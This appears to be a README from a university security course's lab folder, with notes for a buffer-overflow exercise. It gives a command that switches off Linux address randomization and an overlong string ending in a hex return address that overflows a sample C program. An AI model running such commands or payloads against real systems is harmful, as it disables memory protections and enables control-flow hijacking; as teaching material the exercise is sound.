progs/README
author Christian Urban <christian dot urban at kcl dot ac dot uk>
Wed, 29 Oct 2014 13:08:11 +0000
changeset 263 8a42736cce27
parent 213 9c2fa54c7c2d
child 392 4dff36e2bbc6
permissions -rw-r--r--
updated 5th handout

to switch off address randomization

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space



C0.c

add to string 
 
  " \x15\xcd\x5b\x07"

to get

  foo("my string is too long !!!!! \x15\xcd\x5b\x07");